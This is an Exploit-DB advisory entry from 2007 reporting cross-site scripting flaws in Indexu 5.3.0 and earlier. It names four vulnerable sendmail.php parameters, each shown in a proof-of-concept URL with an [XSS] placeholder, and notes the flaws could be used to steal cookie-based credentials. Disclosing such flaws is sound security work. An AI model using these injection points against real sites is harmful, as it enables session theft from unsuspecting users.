Indexu 5.0/5.3 - 'Sendmail.php' Multiple Cross-Site Scripting Vulnerabilities

EDB-ID:

29481




Platform:

PHP

Date:

2007-01-16


source: https://www.securityfocus.com/bid/22084/info
    
Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
    
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
    
Indexu 5.3.0 and prior versions are vulnerable; other versions may also be affected. 

http://www.example.com/INDEXU_PATH/sendmail.php?error_msg=[XSS]
http://www.example.com/INDEXU_PATH/sendmail.php?email=[XSS]
http://www.example.com/INDEXU_PATH/sendmail.php?name=[XSS]
http://www.example.com/INDEXU_PATH/sendmail.php?subject=[XSS]